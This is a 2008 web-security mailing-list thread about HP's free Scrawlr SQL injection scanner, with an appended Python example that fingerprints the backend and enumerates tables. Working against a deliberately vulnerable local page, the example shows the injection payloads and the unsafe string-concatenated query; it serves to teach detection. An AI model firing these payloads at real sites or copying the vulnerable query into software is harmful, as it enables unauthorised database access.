
Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler



OK - then don't use it. Those folks who run SQL-based web applications who aren't savvy enough to use advanced penetration testing tools like you will find Scrawlr very handy in identifying the "low-hanging fruit" out there for exploitation. If you've kept up on the news, the advisory Microsoft is issuing deals with the Google search-based automated exploit tool that attacks classic ASP and SQL database-driven sites and infests them with various malware, etc... it's a big enough problem that Microsoft went out of their way to issue a big advisory and is offering *free* assistance.

For the record, I work in the same "Application Security Center [ASC]" group at HP as Billy...

__
Rafal M. Los
IT Security - Response | Mitigation | Strategy

E-mail:  rafal@xxxxxxxxxxxxxxxx
Direct:  +1 (404) 606-6056
- gPGP:    0xFFC63B33
- Blog:    http://preachsecurity.blogspot.com
- Web:     http://www.ishackingyou.com
- LinkedIn:http://www.linkedin.com/in/rmlos

--------------------------------------------------
From: "Michael S. Menefee" <mmenefee@xxxxxxxxxxxxxxx>
Sent: Tuesday, June 24, 2008 9:07 PM
To: "Bryan Sullivan" <bryansul@xxxxxxxxxxxxx>; "Zinho" <zinho@xxxxxxxxxxxxxxxxx>; <websecurity@xxxxxxxxxxxxx>
Subject: RE: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler


Well, if it does not account for form variables, then it doesn't really
account for much...




-----Original Message-----
From: Bryan Sullivan [mailto:bryansul@xxxxxxxxxxxxx]
Sent: Tuesday, June 24, 2008 8:23 PM
To: Zinho; websecurity@xxxxxxxxxxxxx
Subject: RE: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

No, it definitely does check for blind SQLi. Are your test pages
vulnerable through form inputs? As Billy said earlier, Scrawlr does not
submit forms.

-----Original Message-----
From: Zinho [mailto:zinho@xxxxxxxxxxxxxxxxx]
Sent: Tuesday, June 24, 2008 5:04 PM
To: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

I have to agree with Michael. I tested it on both simple ASP and PHP
pages with a clear SQL injection. Nothing. The tool doesn't even seem to
check for blind SQLi.
I think it merely gets the server's response and looks for known SQL
errors. Not to mention the limited crawling capabilities.
I would have expected something more from HP/MS. Free tools around do a
much better job.

http://www.hackerscenter.com/index.php?/Blogs/2819-HP-and-MS-give-us-a-new-SQL-Injection-tool.html


---- Armando Romeo

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Michael S. Menefee wrote:
Billy,

Although this is indeed a good step, there are already a plethora of
"free" SQL injection scanners or exploiters that kick the crap out of
this tool.

However, I am extremely excited to see this kind of development in the
commercial space, and would like to see some enhancements to this
product. Now, if HP's goal is to push their commercial tools ($$$) by
pushing a limited "free" version, then I suppose none of this will ever
happen, but *at a minimum* it would be nice to be able to either modify
headers or input credentials where public sites are not the target.

I tested this on 3 sites I knew to be vulnerable to SQL injection (all
ASP.NET, MSSQL), but either cookies or authentication were required to
actually test in these cases, hence nothing was discovered with this
tool (lame).

There's nothing worse than a free version of a product designed
exclusively for you to be left "wanting" and thinking about purchasing
the commercial version.

If there are unseen or hidden options to this tool, forgive me,
otherwise I don't really see the value when so many better free tools
exist (Pangolin, Absinthe, Magic, Power Injector, etc, etc, etc).








-----Original Message-----
From: Hoffman, Billy [mailto:billy.hoffman@xxxxxx]
Sent: Tuesday, June 24, 2008 5:35 PM
To: websecurity@xxxxxxxxxxxxx
Subject: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

In response to all the Mass SQL Injection attacks this year, Microsoft
approached HP and the Web Security Research Group (formerly SPI Labs)
for assistance. While there was nothing they could patch, Microsoft
wanted to provide tools to help developers find and fix these issues.
After a month of development HP created Scrawlr.

Scrawlr (short for SQL Injector and Crawler) is a free tool that will
crawl a website while simultaneously analyzing the parameters of each
individual web page for SQL Injection vulnerabilities. Scrawlr was
designed specifically to help protect against these mass injection
attacks, which are using Google queries to find older web applications
and automatically inject them. As such, Scrawlr crawls a website using
the same techniques as a search engine: it doesn't keep state, or submit
forms, or execute JavaScript or Flash. Thus Scrawlr is finding and
auditing the pages that would have been indexed by the search engines.

To reduce false positives Scrawlr provides proof of the vulnerability
results by displaying the type of backend database in use and a list of
available table names. There is no denying you have SQL Injection when I
can show you table names!

Microsoft Announcement here:
http://www.microsoft.com/technet/security/advisory/954462.mspx
HP WSRG Blog:

http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx
Download here: https://download.spidynamics.com/Products/scrawlr/

Enjoy,
Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069
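The checking approach the announcement describes (test each query-string parameter of a crawled page, submit no forms and keep no state, then prove a hit by naming the backend and listing table names), as an added example. This is not Scrawlr's code and nothing here comes from HP or Microsoft: the vulnerable product page, the example.test URL, the in-process SQLite backend and the error signatures are all constructed for illustration. It covers both the "look for known SQL errors" check Zinho describes and the boolean-blind check Bryan says the tool also performs, using a page variant that hides its database errors.

```python
"""Miniature search-engine-style SQL injection check (added example).

Not Scrawlr's code and not from HP or Microsoft. The "website" is a
constructed in-process handler backed by SQLite that concatenates a
query-string parameter into SQL; the scanner, like the announcement says
Scrawlr does, only tests URL parameters: no forms, no cookies, no state.
"""
import re
import sqlite3
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# --- constructed target --------------------------------------------------
_db = sqlite3.connect(":memory:", check_same_thread=False)
_db.executescript("""
    CREATE TABLE products(id INTEGER, name TEXT);
    INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
    CREATE TABLE users(id INTEGER, login TEXT);
    INSERT INTO users VALUES (1, 'admin');
""")

def vulnerable_page(params, leak_errors=True):
    """Deliberately vulnerable 'product page': the id parameter goes straight
    into the SQL text. With leak_errors=True the raw database error is shown
    (classic error-based SQLi); with False only a generic message appears,
    so a scanner has to fall back to a blind technique."""
    sql = "SELECT name FROM products WHERE id = " + params.get("id", "0")
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        detail = str(exc) if leak_errors else "please try again later"
        return "<html>Database error: %s</html>" % detail
    return "<html>" + "".join("<li>%s</li>" % r[0] for r in rows) + "</html>"

def quiet_page(params):
    """Same bug, but the page swallows the database error message."""
    return vulnerable_page(params, leak_errors=False)

# --- scanner -------------------------------------------------------------
# Error strings an error-based check looks for (SQLite, MSSQL, MySQL wording).
SQL_ERROR_PATTERNS = [re.compile(p, re.I) for p in (
    r"unrecognized token", r"no such column", r"near .*: syntax error",
    r"unclosed quotation mark", r"you have an error in your sql syntax",
)]

# Expressions that only evaluate on one backend; a true/false test tells which.
DBMS_PROBES = {"SQLite": "sqlite_version()", "MySQL": "version()", "MSSQL": "@@version"}

def fetch(url, app):
    """Stand-in for an HTTP GET: hand the URL's query string to the page."""
    return app(dict(parse_qsl(urlsplit(url).query)))

def with_param(url, name, value):
    """Rebuild url with one query-string parameter replaced."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query))
    query[name] = value
    return urlunsplit(parts._replace(query=urlencode(query)))

def scan_url(url, app=vulnerable_page):
    """Test every query-string parameter of one crawled URL.
    Returns {param: 'error-based' | 'boolean-blind' | None}."""
    baseline = fetch(url, app)
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query):
        # 1. error-based: a stray quote should surface a database error.
        body = fetch(with_param(url, name, value + "'"), app)
        if any(p.search(body) for p in SQL_ERROR_PATTERNS):
            findings[name] = "error-based"
            continue
        # 2. boolean-blind: a true condition leaves the page unchanged while
        #    a false one changes it, so the value reaches a SQL predicate.
        same = fetch(with_param(url, name, value + " AND 1=1"), app) == baseline
        diff = fetch(with_param(url, name, value + " AND 1=2"), app) != baseline
        findings[name] = "boolean-blind" if same and diff else None
    return findings

def prove(url, name, app=vulnerable_page):
    """Turn a finding into the kind of proof the announcement describes: name
    the backend and list table names. The catalog query is SQLite's; on MSSQL
    one would read information_schema.tables instead."""
    baseline = fetch(url, app)
    value = dict(parse_qsl(urlsplit(url).query))[name]
    dbms = next((d for d, expr in DBMS_PROBES.items()
                 if fetch(with_param(url, name, "%s AND %s IS NOT NULL" % (value, expr)), app) == baseline),
                "unknown")
    union = value + " UNION SELECT name FROM sqlite_master WHERE type='table'"
    items = lambda body: set(re.findall(r"<li>(.*?)</li>", body))
    tables = sorted(items(fetch(with_param(url, name, union), app)) - items(baseline))
    return dbms, tables

if __name__ == "__main__":
    url = "http://example.test/product.asp?id=1&lang=en"   # constructed URL
    print(scan_url(url))              # {'id': 'error-based', 'lang': None}
    print(scan_url(url, quiet_page))  # {'id': 'boolean-blind', 'lang': None}
    print(prove(url, "id"))           # ('SQLite', ['products', 'users'])
```

The `lang` parameter never reaches SQL, so both checks report it clean; `id` is flagged error-based when the page leaks its error text and boolean-blind when it does not, which is exactly the case a "known SQL errors only" scanner misses. The proof step is what turns a suspected hit into something nobody can argue with: a list of table names pulled through the same parameter.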



----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA


Brought to you by http://www.webappsec.org